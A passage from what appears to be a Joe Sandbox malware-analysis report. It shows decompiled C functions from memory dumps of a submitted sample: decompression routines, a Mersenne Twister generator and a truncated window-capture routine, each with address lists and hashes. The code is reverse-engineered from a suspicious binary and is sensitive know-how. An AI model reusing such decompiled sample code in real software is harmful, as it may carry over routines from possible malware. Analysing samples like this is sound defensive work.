									_t71 = _t71 + 4;
									_t81 = 0x1f;
									_t133 = _t145 >> 0x1f;
								} else {
									_t81 = _t87 - 1;
									_t133 = _t145 >> _t81 & 0x00000001;
								}
								_v16 = _t81;
								if(_t133 == 0) {
									goto L32;
								} else {
									_v8 = _v8 + 2;
									_t120 = _v8;
									goto L42;
								}
								goto L48;
							}
						}
						_t96 = _v32;
						goto L24;
					}
					goto L48;
				}
			}

0x012b5b57
0x012b5b59
0x012b5b5e
0x012b5b60
0x012b5b62
0x012b5b64
0x012b5b6b
0x012b5b6e
0x012b5b6e
0x012b5b73
0x012b5b84
0x012b5b86
0x012b5b89
0x012b5b8a
0x012b5b75
0x012b5b75
0x012b5b7a
0x012b5b7a
0x012b5b8d
0x012b5b92
0x00000000
0x00000000
0x012b5b97
0x012b5d57
0x00000000
0x012b5ba6
0x012b5bac
0x012b5baf
0x012b5bb0
0x012b5bb1
0x012b5bb1
0x00000000
0x012b5bb1
0x012b5bb6
0x012b5bb6
0x00000000
0x012b5bbd
0x012b5bbf
0x012b5bcb
0x012b5bd2
0x012b5bd5
0x012b5bd6
0x012b5bc1
0x012b5bc1
0x012b5bc6
0x012b5bc6
0x012b5bdc
0x012b5bdf
0x012b5be5
0x00000000
0x00000000
0x012b5bf9
0x012b5c05
0x012b5c0c
0x012b5c0f
0x012b5c10
0x012b5bfb
0x012b5bfb
0x012b5c00
0x012b5c00
0x012b5c15
0x00000000
0x012b5c17
0x012b5c17
0x012b5c1d
0x012b5c27
0x00000000
0x00000000
0x012b5c37
0x012b5c39
0x012b5c3d
0x012b5d50
0x00000000
0x012b5d52
0x012b5c43
0x012b5c44
0x012b5c47
0x012b5c47
0x012b5c4c
0x012b5c58
0x012b5c5f
0x012b5c62
0x012b5c63
0x012b5c4e
0x012b5c4e
0x012b5c53
0x012b5c53
0x012b5c66
0x012b5c6b
0x012b5c77
0x012b5c7e
0x012b5c81
0x012b5c82
0x012b5c6d
0x012b5c6d
0x012b5c72
0x012b5c72
0x012b5c85
0x012b5c88
0x012b5c8d
0x012b5cf7
0x012b5cf7
0x012b5d02
0x012b5d06
0x012b5d08
0x012b5d10
0x00000000
0x012b5d17
0x012b5d1c
0x012b5d21
0x012b5d27
0x012b5d2a
0x012b5d2b
0x012b5d2e
0x012b5d36
0x012b5d39
0x012b5d3a
0x012b5d3d
0x012b5d3d
0x012b5d3d
0x00000000
0x012b5d42
0x012b5c8f
0x012b5c8f
0x00000000
0x012b5c96
0x012b5c98
0x012b5ca9
0x012b5cab
0x012b5cae
0x012b5caf
0x012b5c9a
0x012b5c9a
0x012b5c9f
0x012b5c9f
0x012b5cb5
0x012b5cb8
0x012b5cbe
0x00000000
0x00000000
0x012b5ccf
0x012b5cdb
0x012b5ce2
0x012b5ce5
0x012b5ce6
0x012b5cd1
0x012b5cd1
0x012b5cd6
0x012b5cd6
0x012b5ce9
0x012b5cee
0x00000000
0x012b5cf0
0x012b5cf0
0x012b5cf4
0x00000000
0x012b5cf4
0x00000000
0x012b5cee
0x012b5c8d
0x012b5c1f
0x00000000
0x012b5c1f
0x00000000
0x012b5c15

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1615f9a3bdffffc5273664e4e4254ec4cfde0530ca27db16a39bb6be12e29af4
Instruction ID: 2aab4c34e696b02d432fc8b635eba71aace63c63308ebf33810e22ee31322196
Opcode Fuzzy Hash: 1615f9a3bdffffc5273664e4e4254ec4cfde0530ca27db16a39bb6be12e29af4
Instruction Fuzzy Hash: B061A332D155179BDF18CE49C4816EDBB73EFC5364F3A8299CA466F386C670A942CB80

Uniqueness

Uniqueness Score: -1.00%

Function 012B6177 Relevance: .2, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E012B6177(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _t77;
				signed int _t78;
				void* _t81;
				signed int _t83;
				signed char _t84;
				signed char _t85;
				signed char _t86;
				intOrPtr _t90;
				intOrPtr _t91;
				signed char _t94;
				unsigned int _t97;
				signed int _t98;
				unsigned int _t99;
				signed int _t100;
				signed int _t102;
				unsigned int _t104;
				signed int _t106;
				signed int _t108;
				unsigned int _t114;
				signed int _t115;
				signed int _t117;
				signed int _t133;
				signed int _t138;
				void* _t139;
				intOrPtr* _t143;
				signed int _t147;
				signed int _t152;
				signed int _t155;

				_t155 = 0;
				_t81 = __ecx;
				_v28 = __edx;
				_t83 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t83 == 0) {
						_t97 =  *(_t155 + _t81);
						_t155 = _t155 + 4;
						_t84 = 0x1f;
						_t98 = _t97 >> 0x1f;
					} else {
						_t84 = _t83 - 1;
						_t98 = _t77 >> _t84 & 0x00000001;
					}
					_v8 = _t84;
					if(_t98 == 0) {
						_v12 = 1;
						L8:
						L8:
						if(_t84 == 0) {
							_t99 =  *(_t155 + _t81);
							_t155 = _t155 + 4;
							_t85 = 0x1f;
							_t100 = _t99 >> 0x1f;
						} else {
							_t85 = _t84 - 1;
							_t100 = _t77 >> _t85 & 0x00000001;
						}
						_t133 = _t100 + _v12 * 2;
						_v12 = _t133;
						if(_t85 == 0) {
							_t77 =  *(_t155 + _t81);
							_t155 = _t155 + 4;
							_t86 = 0x1f;
							_t102 = _t77 >> 0x1f;
						} else {
							_t86 = _t85 - 1;
							_t102 = _t77 >> _t86 & 0x00000001;
						}
						if(_t102 != 0) {
							goto L19;
						}
						if(_t86 == 0) {
							_t77 =  *(_t155 + _t81);
							_t155 = _t155 + 4;
							_t84 = 0x1f;
							_t152 = _t77 >> 0x1f;
						} else {
							_t84 = _t86 - 1;
							_t152 = _t77 >> _t84 & 0x00000001;
						}
						_t23 = _v12 * 2; // -2
						_v12 = _t152 + _t23 - 2;
						goto L8;
						L19:
						if(_t133 != 2) {
							_t104 = ( *(_t155 + _t81) & 0x000000ff) + (_t133 + 0xfffffffd << 8);
							_t155 = _t155 + 1;
							if(_t104 == 0xffffffff) {
								_t78 = _a8;
								 *_t78 = _v16;
								return _t78 & 0xffffff00 | _t155 == _v28;
							}
							_t138 =  !_t104 & 0x00000001;
							_t106 = (_t104 >> 1) + 1;
							_v12 = _t106;
							_v20 = _t106;
							L25:
							if(_t86 == 0) {
								_t77 =  *(_t155 + _t81);
								_t155 = _t155 + 4;
								_v8 = 0x1f;
								_t108 = _t77 >> 0x1f;
							} else {
								_t94 = _t86 - 1;
								_v8 = _t94;
								_t108 = _t77 >> _t94 & 0x00000001;
							}
							_t139 = _t108 + _t138 * 2;
							if(_t139 != 0) {
								L38:
								asm("sbb ecx, ecx");
								_t90 = _v16;
								_v24 = _t139 +  ~0x500;
								_t143 = _t90 - _v12 + _a4;
								_v16 = _t143;
								 *((char*)(_t90 + _a4)) =  *_t143;
								_t91 = _t90 + 1;
								_v16 = _v16 + 1;
								do {
									 *((char*)(_t91 + _a4)) =  *_v16;
									_t91 = _t91 + 1;
									_v16 = _v16 + 1;
									_t66 =  &_v24;
									 *_t66 = _v24 - 1;
								} while ( *_t66 != 0);
								_v16 = _t91;
								goto L6;
							} else {
								_t147 = _t139 + 1;
								do {
									if(_v8 <= 0) {
										_t114 =  *(_t155 + _t81);
										_t155 = _t155 + 4;
										_v8 = 0x1f;
										_t115 = _t114 >> 0x1f;
									} else {
										_v8 = _v8 - 1;
										_t115 = _t77 >> _v8 & 0x00000001;
									}
									_t147 = _t115 + _t147 * 2;
									if(_v8 <= 0) {
										_t77 =  *(_t155 + _t81);
										_t155 = _t155 + 4;
										_v8 = 0x1f;
										_t117 = _t77 >> 0x1f;
									} else {
										_v8 = _v8 - 1;
										_t117 = _t77 >> _v8 & 0x00000001;
									}
								} while (_t117 == 0);
								_t139 = _t147 + 2;
								goto L38;
							}
						}
						_v12 = _v20;
						if(_t86 == 0) {
							_t77 =  *(_t155 + _t81);
							_t155 = _t155 + 4;
							_t86 = 0x1f;
							_t138 = _t77 >> 0x1f;
						} else {
							_t86 = _t86 - 1;
							_t138 = _t77 >> _t86 & 0x00000001;
						}
						goto L25;
					} else {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a4)) =  *(_t155 + _t81);
						_t155 = _t155 + 1;
						L6:
						_t83 = _v8;
						continue;
					}
				}
			}

0x012b617f
0x012b6181
0x012b6186
0x012b6189
0x012b618b
0x012b618e
0x00000000
0x012b6195
0x012b6197
0x012b61a8
0x012b61aa
0x012b61ad
0x012b61ae
0x012b6199
0x012b6199
0x012b619e
0x012b619e
0x012b61b1
0x012b61b6
0x012b61cd
0x00000000
0x012b61d4
0x012b61d6
0x012b61e7
0x012b61e9
0x012b61ec
0x012b61ed
0x012b61d8
0x012b61d8
0x012b61dd
0x012b61dd
0x012b61f3
0x012b61f6
0x012b61fb
0x012b6207
0x012b620e
0x012b6211
0x012b6212
0x012b61fd
0x012b61fd
0x012b6202
0x012b6202
0x012b6217
0x00000000
0x00000000
0x012b621b
0x012b6227
0x012b622e
0x012b6231
0x012b6232
0x012b621d
0x012b621d
0x012b6222
0x012b6222
0x012b6238
0x012b623c
0x00000000
0x012b6241
0x012b6244
0x012b6274
0x012b6276
0x012b627a
0x012b635a
0x012b6365
0x012b636c
0x012b636c
0x012b6286
0x012b6289
0x012b628a
0x012b628d
0x012b6290
0x012b6292
0x012b62a1
0x012b62a6
0x012b62a9
0x012b62b0
0x012b6294
0x012b6294
0x012b6299
0x012b629c
0x012b629c
0x012b62b3
0x012b62b8
0x012b6313
0x012b631b
0x012b6321
0x012b6324
0x012b632c
0x012b6331
0x012b6337
0x012b633a
0x012b633b
0x012b633e
0x012b6346
0x012b6349
0x012b634a
0x012b634d
0x012b634d
0x012b634d
0x012b6352
0x00000000
0x012b62ba
0x012b62ba
0x012b62bb
0x012b62bf
0x012b62d3
0x012b62d5
0x012b62d8
0x012b62df
0x012b62c1
0x012b62c1
0x012b62cb
0x012b62cb
0x012b62e6
0x012b62e9
0x012b62fa
0x012b62ff
0x012b6302
0x012b6309
0x012b62eb
0x012b62eb
0x012b62f5
0x012b62f5
0x012b630c
0x012b6310
0x00000000
0x012b6310
0x012b62b8
0x012b6249
0x012b624e
0x012b625a
0x012b6261
0x012b6264
0x012b6265
0x012b6250
0x012b6250
0x012b6255
0x012b6255
0x00000000
0x012b61b8
0x012b61c1
0x012b61c4
0x012b61c7
0x012b61c8
0x012b61c8
0x00000000
0x012b61c8
0x012b61b6

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45bc99e27de370642eb968c48229f4352b0d72fbd46c517c0aecccb0a9ab2d34
Instruction ID: 68ff084ef0b5a9829e9e88a48a9d99c896991c5e1d20b0638d13f12f2ddad159
Opcode Fuzzy Hash: 45bc99e27de370642eb968c48229f4352b0d72fbd46c517c0aecccb0a9ab2d34
Instruction Fuzzy Hash: BF61D936E255079BEB08CF58C4812EDB7B3FBC4350F258169DD566B389C770A942CB80

Uniqueness

Uniqueness Score: -1.00%

Function 012B5D60 Relevance: .2, Instructions: 186
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E012B5D60(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr _v28;
				unsigned int _t64;
				signed int _t65;
				intOrPtr _t68;
				signed int _t70;
				signed int _t74;
				signed char _t79;
				signed char _t80;
				signed char _t81;
				signed char _t83;
				signed char _t84;
				intOrPtr* _t89;
				signed char _t93;
				unsigned int _t96;
				signed int _t97;
				signed int _t99;
				signed int _t102;
				void* _t106;
				signed int _t107;
				signed int _t109;
				void* _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				unsigned int _t116;
				signed int _t117;
				signed int _t120;
				void* _t131;
				signed char _t132;

				_t68 = _a4;
				_t132 = 0;
				_t131 = __ecx;
				_v28 = __edx;
				_t79 = 0;
				_v20 = 0;
				_v24 = 1;
				L1:
				while(1) {
					if(_t79 == 0) {
						_t96 =  *(_t132 + _t131);
						_t132 = _t132 + 4;
						_t80 = 0x1f;
						_t97 = _t96 >> 0x1f;
					} else {
						_t68 = _a4;
						_t80 = _t79 - 1;
						_t97 = _t64 >> _t80 & 0x00000001;
					}
					_v16 = _t80;
					if(_t97 != 0) {
						_v20 = _v20 + 1;
						 *((char*)(_v20 + _t68)) =  *(_t132 + _t131);
						_t132 = _t132 + 1;
						L6:
						_t79 = _v16;
						continue;
					}
					_v12 = 1;
					do {
						if(_t80 == 0) {
							_t64 =  *(_t132 + _t131);
							_t132 = _t132 + 4;
							_t81 = 0x1f;
							_t99 = _t64 >> 0x1f;
						} else {
							_t81 = _t80 - 1;
							_t99 = _t64 >> _t81 & 0x00000001;
						}
						_v12 = _t99 + _v12 * 2;
						if(_t81 == 0) {
							_t64 =  *(_t132 + _t131);
							_t132 = _t132 + 4;
							_t80 = 0x1f;
							_t102 = _t64 >> 0x1f;
						} else {
							_t80 = _t81 - 1;
							_t102 = _t64 >> _t80 & 0x00000001;
						}
					} while (_t102 == 0);
					_t70 = _v12;
					if(_t70 == 2) {
						_t107 = _v24;
						L19:
						_v12 = _t107;
						if(_t80 == 0) {
							_t64 =  *(_t132 + _t131);
							_t132 = _t132 + 4;
							_t83 = 0x1f;
							_t109 = _t64 >> 0x1f;
						} else {
							_t83 = _t80 - 1;
							_t109 = _t64 >> _t83 & 0x00000001;
						}
						_v8 = _t109;
						if(_t83 == 0) {
							_t64 =  *(_t132 + _t131);
							_t132 = _t132 + 4;
							_t84 = 0x1f;
							_t74 = _t64 >> 0x1f;
						} else {
							_t84 = _t83 - 1;
							_t74 = _t64 >> _t84 & 0x00000001;
						}
						_t110 = _t74 + _t109 * 2;
						_v16 = _t84;
						if(_t110 == 0) {
							_v8 = 1;
							do {
								if(_t84 == 0) {
									_t116 =  *(_t132 + _t131);
									_t132 = _t132 + 4;
									_t93 = 0x1f;
									_t117 = _t116 >> 0x1f;
								} else {
									_t93 = _t84 - 1;
									_t117 = _t64 >> _t93 & 0x00000001;
								}
								_v8 = _t117 + _v8 * 2;
								if(_t93 == 0) {
									_t64 =  *(_t132 + _t131);
									_t132 = _t132 + 4;
									_t84 = 0x1f;
									_t120 = _t64 >> 0x1f;
								} else {
									_t84 = _t93 - 1;
									_t120 = _t64 >> _t84 & 0x00000001;
								}
							} while (_t120 == 0);
							_v16 = _t84;
							_t110 = _v8 + 2;
						}
						_t68 = _a4;
						asm("sbb ecx, ecx");
						_v8 = _t110 +  ~0xd00;
						_t112 = _v20;
						_t89 = _t112 - _v12 + _t68;
						_v20 = _t89;
						 *((char*)(_t112 + _t68)) =  *_t89;
						_t113 = _t112 + 1;
						_v20 = _v20 + 1;
						do {
							 *((char*)(_t113 + _t68)) =  *_v20;
							_t113 = _t113 + 1;
							_v20 = _v20 + 1;
							_t54 =  &_v8;
							 *_t54 = _v8 - 1;
						} while ( *_t54 != 0);
						_v20 = _t113;
						goto L6;
					}
					_t106 = ( *(_t132 + _t131) & 0x000000ff) + (_t70 + 0xfffffffd << 8);
					_t132 = _t132 + 1;
					if(_t106 != 0xffffffff) {
						_t107 = _t106 + 1;
						_v24 = _t107;
						goto L19;
					}
					_t65 = _a8;
					 *_t65 = _v20;
					return _t65 & 0xffffff00 | _t132 == _v28;
				}
			}

0x012b5d67
0x012b5d6b
0x012b5d6e
0x012b5d72
0x012b5d75
0x012b5d77
0x012b5d7a
0x00000000
0x012b5d81
0x012b5d83
0x012b5d97
0x012b5d99
0x012b5d9c
0x012b5d9d
0x012b5d85
0x012b5d85
0x012b5d88
0x012b5d8d
0x012b5d8d
0x012b5da0
0x012b5da5
0x012b5dad
0x012b5db0
0x012b5db3
0x012b5db4
0x012b5db4
0x00000000
0x012b5db4
0x012b5db9
0x012b5dc0
0x012b5dc2
0x012b5dce
0x012b5dd5
0x012b5dd8
0x012b5dd9
0x012b5dc4
0x012b5dc4
0x012b5dc9
0x012b5dc9
0x012b5de2
0x012b5de7
0x012b5df3
0x012b5dfa
0x012b5dfd
0x012b5dfe
0x012b5de9
0x012b5de9
0x012b5dee
0x012b5dee
0x012b5e01
0x012b5e05
0x012b5e0b
0x012b5e0d
0x012b5e2c
0x012b5e2c
0x012b5e31
0x012b5e3d
0x012b5e44
0x012b5e47
0x012b5e48
0x012b5e33
0x012b5e33
0x012b5e38
0x012b5e38
0x012b5e4b
0x012b5e50
0x012b5e5c
0x012b5e63
0x012b5e66
0x012b5e67
0x012b5e52
0x012b5e52
0x012b5e57
0x012b5e57
0x012b5e6a
0x012b5e6d
0x012b5e72
0x012b5e74
0x012b5e7b
0x012b5e7d
0x012b5e8e
0x012b5e90
0x012b5e93
0x012b5e94
0x012b5e7f
0x012b5e7f
0x012b5e84
0x012b5e84
0x012b5e9d
0x012b5ea2
0x012b5eae
0x012b5eb5
0x012b5eb8
0x012b5eb9
0x012b5ea4
0x012b5ea4
0x012b5ea9
0x012b5ea9
0x012b5ebc
0x012b5ec3
0x012b5ec6
0x012b5ec6
0x012b5ec9
0x012b5ed4
0x012b5eda
0x012b5edd
0x012b5ee5
0x012b5ee7
0x012b5eec
0x012b5eef
0x012b5ef0
0x012b5ef3
0x012b5ef8
0x012b5efb
0x012b5efc
0x012b5eff
0x012b5eff
0x012b5eff
0x012b5f04
0x00000000
0x012b5f04
0x012b5e1c
0x012b5e1e
0x012b5e22
0x012b5e28
0x012b5e29
0x00000000
0x012b5e29
0x012b5f0c
0x012b5f17
0x012b5f1e
0x012b5f1e

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c44ff81751284ea01d6f0471a771e16a5ec247b26127d7ef4fed30ebabef44eb
Instruction ID: 1a694d382ac3bb640f6f2fee96d0ea65416989bfb75c5c4a3f011376295fcc7d
Opcode Fuzzy Hash: c44ff81751284ea01d6f0471a771e16a5ec247b26127d7ef4fed30ebabef44eb
Instruction Fuzzy Hash: 61519230E156079BDB18CE99C8C16EEBBB2BFC5310F24C16DDA069F789D6719981CB80

Uniqueness

Uniqueness Score: -1.00%

Function 012B1BC2 Relevance: .1, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E012B1BC2() {
				signed int _t23;
				signed int _t43;
				signed int _t59;
				signed int _t60;
				signed int* _t63;
				signed int _t75;

				_t23 =  *0x12dc350; // 0x0
				if(_t23 >= 0x270) {
					_t75 = 0;
					do {
						_t59 = _t75;
						_t75 = _t75 + 1;
						0x12db980[_t59] = (( *(0x12db984 + _t59 * 4) ^ 0x12db980[_t59]) & 0x7fffffff ^ 0x12db980[_t59]) >> 0x00000001 ^  *(0x12db028 + ((( *(0x12db984 + _t59 * 4) ^ 0x12db980[_t59]) & 0x7fffffff ^ 0x12db980[_t59]) & 0x00000001) * 4) ^  *(0x12dbfb4 + _t59 * 4);
					} while (_t75 < 0xe3);
					if(_t75 < 0x26f) {
						_t63 =  &(0x12db980[_t75]);
						do {
							 *_t63 =  *(0x12db028 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
							_t63 =  &(_t63[1]);
						} while (_t63 < 0x12dc33c);
					}
					_t60 =  *0x12dc33c; // 0x0
					_t43 =  *0x12db980; // 0x0
					 *0x12dc33c = ((_t43 ^ _t60) & 0x7fffffff ^ _t60) >> 0x00000001 ^  *(0x12db028 + (((_t43 ^ _t60) & 0x7fffffff ^ _t60) & 0x00000001) * 4) ^  *0x12dbfb0;
					_t23 = 0;
				}
				 *0x12dc350 = _t23 + 1;
				return (0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b ^ ((0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b ^ ((0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b ^ ((0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b ^ ((0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}

0x012b479e
0x012b47a8
0x012b47b0
0x012b47b7
0x012b47b7
0x012b47e5
0x012b47e6
0x012b47ed
0x012b47fb
0x012b47fd
0x012b4804
0x012b4823
0x012b4825
0x012b4828
0x012b4804
0x012b4830
0x012b4836
0x012b4857
0x012b485c
0x012b485c
0x012b4866
0x012b4891

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d65879ce618a60f7e93f6c152cbf32365d8036330e6723c12161e3e02051a31
Instruction ID: 991be183e9eb87a241ea6187215fbbd42fae23115d648bd612ce2d2f69b26564
Opcode Fuzzy Hash: 1d65879ce618a60f7e93f6c152cbf32365d8036330e6723c12161e3e02051a31
Instruction Fuzzy Hash: 1C219236A324908BCB6CDF3CF8AD5A933D2E78A35431A453CE566C7284DB35E412CB40

Uniqueness

Uniqueness Score: -1.00%

Function 012C105D Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction ID: 62648e3c198b3de8352392380962a175740f7c029ee4a5bc3f3ede40ac0aef95
Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction Fuzzy Hash: 8DE04F7A710151CBD755CA15D482943B7A6FBC9A70B1287A9CE154730BCA34EEC3CAD1

Uniqueness

Uniqueness Score: -1.00%

Function 012CDE5D Relevance: 43.8, APIs: 29, Instructions: 314
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E012CDE5D(intOrPtr __ecx, signed int __edx) {
				signed int _t130;
				signed int _t137;
				int _t139;
				void* _t142;
				void* _t147;
				signed int _t165;
				intOrPtr _t191;
				struct tagRECT _t192;
				intOrPtr _t195;
				struct tagRECT _t196;
				long _t213;
				long _t214;
				long _t215;
				signed int _t216;
				signed int _t217;
				struct HDC__* _t220;
				RECT* _t225;
				struct HDC__* _t227;
				long _t228;
				void* _t229;
				void* _t231;

				_t216 = __edx;
				_t229 = _t231 - 0x70;
				 *((intOrPtr*)(_t229 + 0x58)) = __ecx;
				 *(_t229 + 0x68) = __edx;
				_t130 = L012B1956(__edx) & 0x0000ffff;
				 *(_t229 + 0x5c) = _t130;
				if((_t130 & 0x00000001) == 0) {
					if(_t130 == 0) {
						 *(_t229 + 0x5c) = 2;
						_t130 =  *(_t229 + 0x5c);
					}
					if( *((intOrPtr*)(_t229 + 0x7c)) != 0 && (_t130 & 0x00000002) != 0) {
						 *(_t229 + 0x5c) = _t130 & 0x0000fffd | 0x00000008;
					}
					 *(_t229 + 0x60) = 0;
					 *(_t229 + 0x64) = 0;
					 *(_t229 + 0x50) = 0;
					 *(_t229 + 0x54) = 0;
					 *(_t229 - 0x34) = 0x3c;
					if(GetWindowInfo( *(_t229 + 0x68), _t229 - 0x34) != 0) {
						_t225 =  *(_t229 + 0x78);
						_t217 = _t216 & 0xffffff00 | IntersectRect(_t229 + 0x30, _t229 - 0x30, _t225) != 0x00000000;
						 *(_t229 + 0x7b) = _t217;
						if(_t217 != 0) {
							_t214 = _t225->top;
							_t195 =  *((intOrPtr*)(_t229 - 0x2c));
							if(_t195 < _t214) {
								 *(_t229 + 0x64) = _t195 - _t214;
							}
							_t215 = _t225->left;
							_t196 =  *(_t229 - 0x30);
							if(_t196 < _t215) {
								 *(_t229 + 0x60) = _t196 - _t215;
							}
						}
						_t137 =  *(_t229 + 0x5c) & 0x00000002;
						 *(_t229 + 0x28) = _t137;
						if(_t137 == 0) {
							 *(_t229 + 0x7f) = _t217;
						} else {
							if(( *(_t229 - 0x10) & 0x20000000) == 0) {
								 *(_t229 + 0x7f) = IntersectRect(_t229 + 0x40, _t229 - 0x20, _t225) != 0;
								if( *(_t229 + 0x7f) != 0) {
									_t213 = _t225->top;
									_t191 =  *((intOrPtr*)(_t229 - 0x1c));
									if(_t191 < _t213) {
										 *(_t229 + 0x54) = _t191 - _t213;
									}
									_t228 = _t225->left;
									_t192 =  *(_t229 - 0x20);
									if(_t192 < _t228) {
										 *(_t229 + 0x50) = _t192 - _t228;
									}
								}
							} else {
								 *(_t229 + 0x7f) = 0;
							}
						}
						if( *(_t229 + 0x7b) != 0 ||  *(_t229 + 0x7f) != 0) {
							_t220 = GetDC(0);
							if(_t220 == 0) {
								L30:
								_t139 = 0;
								goto L59;
							}
							_t227 = CreateCompatibleDC(_t220);
